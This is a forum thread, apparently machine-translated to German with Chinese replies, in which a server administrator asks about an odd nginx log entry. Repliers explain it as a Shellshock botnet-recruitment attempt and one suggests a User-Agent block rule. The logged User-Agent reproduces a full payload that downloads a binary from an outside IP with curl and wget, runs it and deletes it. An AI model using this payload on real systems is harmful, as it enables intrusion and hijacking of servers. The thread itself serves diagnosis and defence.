nginx – Fragen zur Verwendung eines Benutzeragenten für Angriffe
世界只因有你
世界只因有你 2017-05-16 17:10:16
0
3
693

Heute habe ich zufällig ein sehr seltsames Protokoll im access.log von nginx auf dem Firmenserver entdeckt:

61.136.82.154 - - [07/Jan/2017:02:27:26 +0000] "GET / HTTP/1.0" 200 3770 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/mig http://37.1.202.6/mig;/usr/bin/wget http://37.1.202.6/mig -O /tmp/mig;chmod +x /tmp/mig;/tmp/mig;rm -rf /tmp/mig*\x22" "-"

Wenn es um seltsame Orte geht:

  1. Mit http1.0

  2. User-Agent ist ein Skript

Ich habe im Internet gesucht und keine Informationen über die Verwendung eines Benutzeragenten für den Angriff gefunden. Obwohl ich den Skriptcode erhalten konnte, indem ich der Adresse im Protokoll folgte, waren meine Fähigkeiten eingeschränkt und ich konnte das Angriffsziel nicht analysieren.

Entschuldigung, gibt es Experten, haben Sie relevante Informationen und Erfahrungen? Bitte teile es mit mir, vielen Dank! !

Hinzugefügt:

Unter welcher Nginx-Konfiguration wird der Inhalt im Benutzeragenten analysiert?

世界只因有你
世界只因有你

Antworte allen(3)
阿神

这个应该是http1.0user-agent漏洞,你的服务器可能被对方注入脚本,他在你上面伪装了一个apache的服务,把你的服务器搞成了肉鸡,并操纵他进行DDOS攻击,但是我不知道nginx会不会执行它这个脚本

你可以看看你access.loghttp://37.1.202.6/mig这个地址。可以看到有个a文件http://37.1.202.6/a 你可以看看这个代码。

滿天的星座

扫描器注入的。。。都会解析User-Agent的。
1、装应用防火墙
2、配置Nginx

`
if ($http_user_agent ~* 'curl') #配置被拒绝的 user_agent。
{
return 403;
}
`

过去多啦不再A梦

一段 perl 脚本,作用就是 伪装成 Apache

然后接受指令干一些事情。。。没错,就是抓肉鸡。

Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage